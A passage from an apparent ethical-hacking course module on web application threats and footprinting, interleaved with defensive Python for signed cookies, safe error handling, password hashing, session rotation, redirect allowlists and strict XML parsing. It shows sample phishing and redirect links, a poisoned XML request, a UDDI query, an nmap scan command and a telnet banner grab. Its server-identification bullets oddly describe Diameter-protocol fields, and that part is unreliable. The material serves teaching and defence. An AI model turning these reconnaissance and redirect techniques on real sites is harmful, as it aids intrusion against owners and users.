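def parse_cookie(header: str) -> dict:
    """Split a Cookie header value into a name -> value dict."""
    fields = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            fields[name.strip()] = value.strip()
    return fields


def protected_keys(fields: dict) -> list:
    """Keys whose integrity the server must guarantee, in canonical order."""
    count = int(fields.get("BasketSize", "0"))
    return ["BasketSize"] + [f"Item{i}" for i in range(1, count + 1)] + ["TotalPrice"]


def sign(fields: dict) -> str:
    """HMAC-SHA256 over the protected fields; only the server can produce it."""
    canonical = "&".join(f"{k}={fields.get(k, '')}" for k in protected_keys(fields))
    return hmac.new(SERVER_SECRET, canonical.encode(), hashlib.sha256).hexdigest()


def server_total(fields: dict) -> int:
    """Recompute the basket total from the server-side catalog, never from the cookie."""
    count = int(fields.get("BasketSize", "0"))
    return sum(CATALOG[fields[f"Item{i}"]] for i in range(1, count + 1))


def issue_cookie(session_id: str, items: list) -> str:
    """Cookie the server sets at step 2 of the diagram, with an added Sig field."""
    fields = {"SESSIONID": session_id, "BasketSize": str(len(items))}
    for i, item in enumerate(items, start=1):
        fields[f"Item{i}"] = item
    fields["TotalPrice"] = str(server_total(fields))
    fields["Sig"] = sign(fields)
    return "; ".join(f"{k}={v}" for k, v in fields.items())


def check_order(cookie_header: str) -> tuple:
    """Validate a checkout request; returns (accepted, detail)."""
    fields = parse_cookie(cookie_header)
    try:
        # 1. Integrity: a cookie edited on the client no longer matches its signature.
        sig = fields.get("Sig", "")
        if not sig or not hmac.compare_digest(sig, sign(fields)):
            return False, "cookie signature missing or mismatched"
        # 2. Defense in depth: the price is what the catalog says, not what the cookie says.
        expected = server_total(fields)
    except (KeyError, ValueError, TypeError) as exc:
        return False, f"malformed basket: {exc!r}"
    if str(expected) != fields.get("TotalPrice"):
        return False, f"TotalPrice {fields.get('TotalPrice')} != server total {expected}"
    return True, f"order accepted, total {expected}"


if __name__ == "__main__":
    good = issue_cookie("325896ASDD23SA3587", ["1258", "2658", "6652"])
    print(check_order(good))
    print(check_order(good.replace("TotalPrice=11568", "TotalPrice=100")))
```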


Session Fixation Attack

In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value.

1. Attacker logs on to the bank website (juggybank.com) using his credentials; the web server sets a session ID on the attacker's machine
2. Attacker sends an email containing a link with a fixed session ID: http://juggybank.com/login.jsp?sessionid=4321
3. User clicks on the link and is redirected to the bank website
4. User logs into the server using his credentials and the fixed session ID
5. Attacker logs into the server using the victim's credentials with the same session ID
6. Attacker assumes the identity of the victim and exploits his credentials at the server

Session Fixation Attacks

Session fixation helps an attacker hijack a valid user session. In this attack, the attacker authenticates him or herself with a known session ID and then lures the victim into using the same session ID. If the victim uses the session ID sent by the attacker, the attacker hijacks the user's validated session, since the session ID in use is already known to the attacker. The session fixation attack procedure is explained with the help of the following diagram:
The diagram shows the attacker logging on to juggybank.com and receiving a session ID, emailing the victim a link carrying a fixed session ID (http://juggybank.com/login.jsp?sessionid=4321), the user clicking the link and logging in with that fixed session ID, and the attacker then logging into the server with the same session ID.

FIGURE 13.26: Session Fixation Attack


Insufficient Transport Layer Protection

Insufficient transport layer protection supports weak algorithms, and uses expired or invalid certificates.

An underprivileged SSL setup can also help the attacker to launch phishing and MITM attacks.

This vulnerability exposes users' data to untrusted third parties and can lead to account theft.

Insufficient Transport Layer Protection

SSL/TLS should be used for authentication on websites; otherwise an attacker can monitor network traffic to steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted, or data can be intercepted, injected, or redirected. Various threats like account theft, phishing attacks, and compromise of admin accounts may follow once systems have been compromised.


Improper Error Handling

Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities.

Information Gathered:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment

Example error page shown on the slide (http://juggyboy.com/):

General Error
Could not obtain post/user information
DEBUG MODE
SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = 1547 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
Line: 435
File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php

Improper Error Handling

Improper error handling may result in various security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. From them an attacker can obtain various details related to the software version, the network, etc. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks. Improper error handling may allow an attacker to gather information such as:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment
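The error page on the slide hands the attacker the query, the table names and a server file path. The following added example (not the module's code) contrasts the debug-mode handler that echoes the exception with a hardened handler that returns only a reference id and logs the detail server-side, plus a small response filter that flags leaked internals; the forum failure it raises is constructed from the slide's message.

```python
import logging
import re
import uuid

# Server-side log; its content must never be copied into the HTTP response.
log = logging.getLogger("juggyboy.demo")


class DatabaseError(Exception):
    pass


def load_topic(topic_id: int) -> dict:
    """Constructed failure mimicking the slide's forum error (not a real query)."""
    raise DatabaseError(
        "SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. "
        f"SELECT u.username FROM nuke_bbposts p WHERE p.topic_id = {topic_id} "
        "File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php"
    )


def view_topic_debug(topic_id: int) -> tuple:
    """The improper form: DEBUG MODE echoes the raw exception to the user, as on the slide."""
    try:
        return 200, load_topic(topic_id)
    except Exception as exc:
        return 500, f"General Error\nDEBUG MODE\n{exc}"


def view_topic(topic_id: int) -> tuple:
    """The hardened form: a generic message plus a correlation id for the client,
    the full detail (type, message) only in the server log."""
    try:
        return 200, load_topic(topic_id)
    except Exception as exc:
        ref = uuid.uuid4().hex[:12]
        log.error("ref=%s type=%s detail=%s", ref, type(exc).__name__, exc)
        return 500, f"An internal error occurred. Reference: {ref}"


# Markers that an error page is leaking internals: query text, engine error codes,
# server file paths, stack frames. Usable as an outbound filter or as a test oracle.
LEAK_PATTERNS = [
    re.compile(r"\bSELECT\b.*\bFROM\b", re.I | re.S),
    re.compile(r"\b(SQL|ODBC|MySQL) Error\b", re.I),
    re.compile(r"(/[\w.-]+){2,}\.(php|aspx?|jsp|py)\b"),
    re.compile(r"\bat [\w.$]+\([\w.]+:\d+\)"),
    re.compile(r"\bLine: ?\d+\b", re.I),
]


def leaks_internal_detail(body: str) -> bool:
    """True when a response body matches any internal-detail marker."""
    return any(p.search(body) for p in LEAK_PATTERNS)


if __name__ == "__main__":
    for handler in (view_topic_debug, view_topic):
        status, body = handler(1547)
        print(handler.__name__, status, "LEAK" if leaks_internal_detail(body) else "clean")
```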


Insecure Cryptographic Storage

Web applications use cryptographic algorithms to encrypt their data and other sensitive information that is transferred from server to client or vice versa. The web application uses cryptographic code to encrypt the data. Insecure cryptographic storage refers to the state of an application in which poorly written encryption code is used to encrypt and store sensitive data in the database. Such insecurely stored data can be easily retrieved and modified by an attacker to gain confidential and sensitive information such as credit card information, passwords, SSNs, and other authentication credentials that were stored without appropriate encryption or hashing, and then used to launch identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to encrypt the sensitive data. The following pictorial representation shows vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.


F IG U R E 13.27: Insecure Cryptographic Storage
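Figure 13.27 contrasts poorly protected storage with properly protected storage. As an added example (not the figure's own code), the block below shows the same contrast for stored passwords: an unsalted MD5 digest, which is identical for identical passwords and cheap to crack, beside salted PBKDF2-HMAC-SHA256 with the work factor stored alongside the hash. The iteration count is an example value.

```python
import hashlib
import hmac
import os

# Example work factor; tune to the deployment's CPU budget (higher is slower for attackers too).
PBKDF2_ITERATIONS = 600_000


def weak_store(password: str) -> str:
    """The insecure form: unsalted MD5. Equal passwords give equal digests, so one
    cracked digest (or a precomputed table) reveals every user with that password."""
    return hashlib.md5(password.encode()).hexdigest()


def secure_store(password: str, salt: bytes = None) -> str:
    """Per-record random salt plus PBKDF2-HMAC-SHA256. The record is stored as
    iterations$salt$hash so the parameters travel with it and can be raised later."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time.
    Malformed records are treated as a failed verification, never as an error page."""
    try:
        iterations, salt_hex, digest_hex = stored.split("$")
        digest = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
        )
    except ValueError:
        return False
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Two users choosing the same password: weak storage exposes the reuse, secure storage does not.
    print(weak_store("Springfield!2010") == weak_store("Springfield!2010"))   # True
    print(secure_store("Springfield!2010") == secure_store("Springfield!2010"))  # False
```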


Broken Authentication and Session Management

An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.

Session ID in URLs
http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico
An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.

Password Exploitation
An attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every user's password.

Timeout Exploitation
If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.

Broken Authentication and Session Management

Authentication and session management includes every aspect of user authentication and managing active sessions. At times even solid authentication fails due to weak credential functions like password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken with user authentication. It is always better to use strong authentication methods such as special software- and hardware-based cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.

Session ID in URLs

An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.

Example: http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico


Timeout Exploitation

If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.

Password Exploitation

An attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every user's password.
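The session fixation attack, the session-ID-in-URL weakness and the timeout exploitation above all come down to how the server issues and retires session identifiers. The following added example (not the module's code) is a minimal server-side session store that discards whatever id the client presented at login and issues a fresh random one (defeating the fixed sessionid=4321), expires idle sessions so an abandoned browser is not reusable, and accepts the id only from the cookie while flagging ids carried in the URL. The idle timeout value is constructed for the example.

```python
import re
import secrets
import time
from urllib.parse import parse_qs, urlsplit

IDLE_TIMEOUT_SECONDS = 15 * 60                      # constructed policy value
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9_-]{43}$")  # shape of secrets.token_urlsafe(32)


class SessionStore:
    """Server-side sessions: ids are always server-generated, rotated at login, idle-expired."""

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested deterministically
        self._sessions = {}

    def login(self, presented_id, username: str) -> str:
        """Whatever id the client presented (e.g. sessionid=4321 from the attacker's link)
        is discarded and a fresh id is issued, so a fixed id never becomes authenticated."""
        self._sessions.pop(presented_id, None)
        new_id = secrets.token_urlsafe(32)
        self._sessions[new_id] = {"user": username, "last_seen": self._now()}
        return new_id

    def user_for(self, session_id):
        """Resolve a session id; unknown or idle-expired ids yield None."""
        entry = self._sessions.get(session_id)
        if entry is None:
            return None
        if self._now() - entry["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[session_id]   # closing the browser is not a logout; the timeout is
            return None
        entry["last_seen"] = self._now()
        return entry["user"]

    def logout(self, session_id) -> None:
        self._sessions.pop(session_id, None)


def session_id_from_request(cookie_header: str, url: str) -> tuple:
    """Take the session id only from the SESSIONID cookie. Any id carried in the URL
    (;jsessionid=... in the path, or a sessionid query parameter) is ignored and
    reported, since URLs leak through logs, Referer headers and shared links."""
    warnings = []
    parts = urlsplit(url)
    if re.search(r";jsessionid=", parts.path, re.I) or "sessionid" in parse_qs(parts.query.lower()):
        warnings.append("session id carried in URL was ignored")
    session_id = None
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "SESSIONID" and SESSION_ID_RE.match(value):
            session_id = value
    return session_id, warnings


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("4321", "victim")          # the fixed id from the attacker's link
    print(sid != "4321", store.user_for("4321"), store.user_for(sid))
```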


Unvalidated Redirects and Forwards

Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass.

Unvalidated Redirect
1. Attacker sends an email containing a rewritten link to the malicious server (http://www.juggyboy.com/redirect.jsp?=http://www.evilserver.com)
2. User is redirected to the attacker's server (Malicious Server)

Unvalidated Forward
1. Attacker requests a page from the server with a forward: http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp
2. Attacker is forwarded to the admin page (http://www.juggyshop.com/admin.jsp)
   Administration Page: Create price list, Create item listing, Purchase records, Registered users

Unvalidated Redirects and Forwards

An attacker links to unvalidated redirects and lures the victim into clicking on it. When the victim clicks on the link, thinking that it is a valid site, it redirects the victim to another site. Such redirects lead to installation of malware and may even trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwards may allow access control bypass leading to:
- Session Fixation Attacks
- Security Management Exploits
- Failure to Restrict URL Access
- Malicious File Execution


The diagram shows the two cases: an unvalidated redirect, where the attacker emails a rewritten link to the malicious server (http://www.juggyboy.com/redirect.aspx?http://www.evilserver.com) and the user is redirected to the attacker's server; and an unvalidated forward, where the attacker requests http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp and is forwarded to the administration page (Create price list, Create item listing, Purchase records, Registered users).

FIGURE 13.28: Unvalidated Redirects and Forwards
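Both cases in Figure 13.28 are stopped by validating the parameter before acting on it. The following added example (not the module's code) validates a redirect target against an allowlist of hosts, accepting otherwise only a same-site relative path, and resolves a forward parameter only through a fixed allowlist of pages so that admin.jsp can never be reached through purchase.jsp. It also covers the usual bypass shapes (scheme-relative "//host", userinfo "@" tricks, backslashes, non-http schemes). The allowlists are constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlists for the example (not from the page).
REDIRECT_HOSTS = {"www.juggyboy.com", "juggyboy.com"}
FORWARD_PAGES = {"cart.jsp", "confirm.jsp", "receipt.jsp"}   # pages purchase.jsp may forward to


def safe_redirect_target(target: str, fallback: str = "/") -> str:
    """Return `target` only if it is a same-site path or an absolute URL on an allowed host;
    anything else becomes `fallback`."""
    if not target or "\\" in target or "\r" in target or "\n" in target:
        return fallback                      # backslash-as-slash and header-injection shapes
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: exactly one leading slash ("//evil" would be scheme-relative).
        if target.startswith("/") and not target.startswith("//"):
            return target
        return fallback
    # hostname drops any "user@" prefix, so http://www.juggyboy.com@evil is seen as evil.
    host = (parts.hostname or "").lower()
    if parts.scheme.lower() in ("http", "https") and host in REDIRECT_HOSTS:
        return target
    return fallback


def safe_forward_target(fwd: str):
    """Server-side forwards resolve only through the allowlist; admin.jsp, traversal
    strings and full URLs are refused (None), and the caller should 400 on None."""
    return fwd if fwd in FORWARD_PAGES else None


if __name__ == "__main__":
    # The two parameters from the figure, as an attacker would send them.
    print(safe_redirect_target("http://www.evilserver.com"))      # "/"
    print(safe_forward_target("admin.jsp"))                       # None
```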


Web Services Architecture

The web services stack shown in the figure is layered as follows, from top to bottom:
- WS-Work Processes
- WS-Security: WS-Federation, WS-Policy, WS-SecurityPolicy; WS-SecureConversation, WS-Trust
- XML Encryption; SAML, Kerberos and X.509 Security Token Profiles; XML Digital Signatures
- XML, SOAP, WSDL, Schema, WS-Addressing, etc.
- HTTP; .Net TCP Channel, Fast InfoSet, etc.

FIGURE 13.29: Web Services Architecture


Web Services Attack

Web services evolution and its increasing use in business offers new attack vectors in an application framework.

Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services.

Web Services Attack

Web services evolution and its increasing use in business offers new attack vectors in an application framework. Web services are process-to-process communications that have special security issues and needs. Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services, all of which are vulnerable to various web application threats. Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. These web services have detailed definitions that allow regular users and attackers to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is provided to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are:
- An attacker injects a malicious script into a web service, and is able to disclose and modify application data.
- An attacker uses a web service for ordering products, and injects a script to reset the quantity and status on the confirmation page to less than what was originally ordered.


In this way, the system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products are being shipped. The attacker winds up receiving more of the product than he or she pays for.


Web Services Footprinting Attack

Attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.

XML Query
POST /inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 229

<?xml version="1.0" encoding="UTF-8"?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
  <Body>
    <find_business generic="2.0" maxRows="50" xmlns="urn:uddi-org:api_v2">
      <name>amazon</name>
    </find_business>
  </Body>
</Envelope>

HTTP/1.1 100 Continue

XML Response
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2004 10:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1272

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
      <serviceInfos>
        <serviceInfo serviceKey="..." businessKey="..."><name xml:lang="en-us">...</name></serviceInfo>
        [four further serviceInfo entries; their serviceKey and businessKey GUIDs are unreadable in the scan and omitted here]
      </serviceInfos>
    </serviceList>
  </soap:Body>
</soap:Envelope>

Web Services Footprinting Attack

Attackers use the Universal Business Registry (UBR) as a major source for gathering information about web services. It is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP, and is somewhat similar to a "Whois server" in functionality. To register web services on a UDDI server, businesses or organizations usually use one of the following structures:
- Business Entity
- Business Service
- Binding Template
- Technical Model (tModel)

Hence, attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.


The figure reproduces the UDDI find_business query (POST /inquire to uddi.microsoft.com with <name>amazon</name>) and the serviceList response shown on the slide.

FIGURE 13.30: Web Services Footprinting Attack


Web Services XML Poisoning

Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic.

Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.

XML Request
<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
  <Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email>
  <PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Poisoned XML Request
<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
  <Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email>
  <PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Web Services XML Poisoning

XML poisoning is similar to a SQL injection attack and has a higher success rate in a web services framework. As web services are invoked using XML documents, the traffic that goes between server and browser applications can be poisoned. Attackers create malicious XML documents to disrupt the parsing mechanisms, like SAX and DOM, that are used on the server. Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.
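The poisoned request above duplicates CustomerNumber and FirstName, which a parser that simply takes "the" value of each node will process inconsistently. The following added example (not the module's code) is a strict parser for CustomerRecord that rejects the poisoned request along with the other shapes the section names: DTD or entity declarations (the external-entity vector), oversized input, and nested or attributed nodes. Both slide requests are embedded so it runs stand-alone; the size limit is a constructed value.

```python
import xml.etree.ElementTree as ET

EXPECTED_FIELDS = ("CustomerNumber", "FirstName", "LastName", "Address", "Email", "PhoneNumber")
MAX_DOCUMENT_BYTES = 4096   # constructed limit for the example


def parse_customer_record(doc: str) -> dict:
    """Parse a CustomerRecord, enforcing the structure the service expects.
    Raises ValueError for anything that deviates instead of letting the
    parser's own error (or a half-processed record) reach the application logic."""
    if len(doc.encode()) > MAX_DOCUMENT_BYTES:
        raise ValueError("document too large")
    # Simple pre-check: this service never needs a DTD, and external entity
    # references are only possible through one, so refuse any declaration outright.
    if "<!DOCTYPE" in doc or "<!ENTITY" in doc:
        raise ValueError("DTD / entity declarations are not accepted")
    try:
        root = ET.fromstring(doc)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from None
    if root.tag != "CustomerRecord" or root.attrib:
        raise ValueError("unexpected root element")
    record = {}
    for child in root:
        if child.tag not in EXPECTED_FIELDS:
            raise ValueError(f"unexpected element {child.tag}")
        if child.tag in record:                      # the node-duplication poisoning on the slide
            raise ValueError(f"duplicate element {child.tag}")
        if len(child) or child.attrib:
            raise ValueError(f"element {child.tag} must be a plain text node")
        record[child.tag] = (child.text or "").strip()
    missing = [f for f in EXPECTED_FIELDS if f not in record]
    if missing:
        raise ValueError(f"missing elements: {', '.join(missing)}")
    if not record["CustomerNumber"].isdigit() or not record["PhoneNumber"].isdigit():
        raise ValueError("CustomerNumber and PhoneNumber must be numeric")
    return record


def rejection_reason(doc: str):
    """None when the document is accepted, otherwise the reason it was refused."""
    try:
        parse_customer_record(doc)
        return None
    except ValueError as exc:
        return str(exc)


# The two requests from the slide, embedded for a stand-alone run.
GOOD_REQUEST = """<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
  <Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email>
  <PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

POISONED_REQUEST = """<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
  <Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email>
  <PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

if __name__ == "__main__":
    print(parse_customer_record(GOOD_REQUEST)["LastName"])   # Springfield
    print(rejection_reason(POISONED_REQUEST))                  # duplicate element CustomerNumber
```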


FIGURE 13.31: Web Services XML Poisoning


Hacking Methodology

Module Flow

So far, we have discussed web application components and various threats associated with web applications. Now we will discuss web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it.

Module flow:
- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing

This section gives a detailed explanation of web application hacking methodology.


Web App Hacking Methodology

In order to hack a web application, the attacker initially tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or web application.


Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications.

Server Discovery: Discover the physical servers that host the web application
Hidden Content Discovery: Extract content and functionality that is not directly linked or reachable from the main visible content
Server Identification: Grab server banners to identify the make and version of the web server software
Service Discovery: Discover the services running on web servers that can be exploited as attack paths for web app hacking

Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:

Server Discovery
In server discovery, when there is an attempt to connect to a server, the redirector makes an incorrect assumption that the root of the URL namespace will be WebDAV-aware. Server discovery finds the physical servers that host the web application.

Service Discovery
Service discovery finds the services running on web servers that can be exploited as attack paths for web app hacking. It searches a targeted application environment for loads and services automatically.

Server Identification
Grab the server banners to identify the make and version of the web server software. It consists of:
- Local Identity: This specifies the server Origin-Realm and Origin-Host.


- Local Addresses: These specify the local IP addresses of the server that are used for Diameter Capability Exchange messages (CER/CEA messages).
- Self-Names: This field specifies the realms to be considered local to the server; any request sent for these realms is treated as if no realm were specified in the request.

Hidden Content Discovery

Extract content and functionality that is not directly linked or reachable from the main visible content.


Footprint Web Infrastructure: Server Discovery

Server discovery gives information about the location of servers and ensures that the target server is alive on the Internet.

Whois lookup utility gives information about the IP address of the web server and DNS names. Whois Lookup Tools:
- http://www.tamos.com
- http://netcraft.com
- http://www.whois.net
- http://www.dnsstuff.com

DNS Interrogation provides information about the location and type of servers. DNS Interrogation Tools:
- http://www.dnsstuff.com
- http://network-tools.com
- http://e-dns.org
- http://www.domaintools.com

Port Scanning attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. Port Scanning Tools:
- Nmap
- NetScan Tools Pro
- WhatsUp PortScanner Tool
- Hping

Footprint Web Infrastructure: Server Discovery

In order to footprint a web infrastructure, first you need to discover the active servers on the Internet. Server discovery gives information about the location of active servers on the Internet. Three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup

Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. It produces the result in the form of an HTML report. It is a utility that gives information about the IP address of the web server and DNS names. Some of the Whois Lookup tools are:
- http://www.tamos.com
- http://netcraft.com
- http://www.whois.net
- http://www.dnsstuff.com

DNS Interrogation

DNS is a distributed database that is used by varied organizations to connect their IP addresses with the respective hostnames and vice versa. When the DNS is improperly configured, it is very easy to exploit it and gather the information required for launching an attack on the target organization. DNS interrogation also provides information about the location and type of servers. Some of the tools are: http://www.dnsstuff.com, http://network-tools.com, http://e-dns.org, http://www.domaintools.com

Port Scanning
Port scanning is the process of scanning the system ports to recognize the open doors. If an attacker recognizes an unused open port, he or she can intrude into the system by exploiting it. This method attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. Some of the tools are: Nmap, NetScan Tools Pro, WhatsUp PortScanner Tool, Hping


Footprint Web Infrastructure: Service Discovery


Footprint Web Infrastructure: Service Discovery


Service discovery finds the services running on web servers that can be exploited as attack paths for web application hacking. Service discovery searches a targeted application environment for loads and services automatically. The targeted server has to be scanned thoroughly so that common ports used by web servers for different services can be identified. The table that follows shows the list of common ports used by web servers and the respective HTTP services:

Port    Typical HTTP Services
80      World Wide Web standard port
81      Alternate WWW
88      Kerberos
443     SSL (https)
900     IBM WebSphere administration client
2301    Compaq Insight Manager
2381    Compaq Insight Manager over SSL
4242    Microsoft Application Center Remote management
7001    BEA WebLogic
7002    BEA WebLogic over SSL
7070    Sun Java Web Server over SSL
8000    Alternate web server, or web cache
8001    Alternate web server or management
8005    Apache Tomcat
9090    Sun Java Web Server admin module
10000   Netscape Administrator interface

TABLE 13.1: Service Discovery

You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser. Source: http://nmap.org Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also define different services running on the web server and give detailed information about the remote computers.
[Screenshot: Zenmap scan of google.com using the command nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 google.com; the Ports/Hosts tab lists 80/tcp open http, 113/tcp closed ident, and 443/tcp open https.]

FIGURE 13.32: Zenmap Tool screenshot


Footprint Web Infrastructure: Server Identification/Banner Grabbing

Analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications.

C:\>telnet www.juggyboy.com 80
HEAD / HTTP/1.0

(The Server header in the HTTP/1.1 200 OK response identifies the server as Microsoft IIS; the response also carries a Set-Cookie header with an ASPSESSIONID cookie and a Via header naming "Application and Content Networking System Software 5.1.15".)

Banner grabbing tools:

1. Telnet

2. Netcat

3. ID Serve

4. Netcraft

Footprint Web Infrastructure: Server Identification/Banner Grabbing

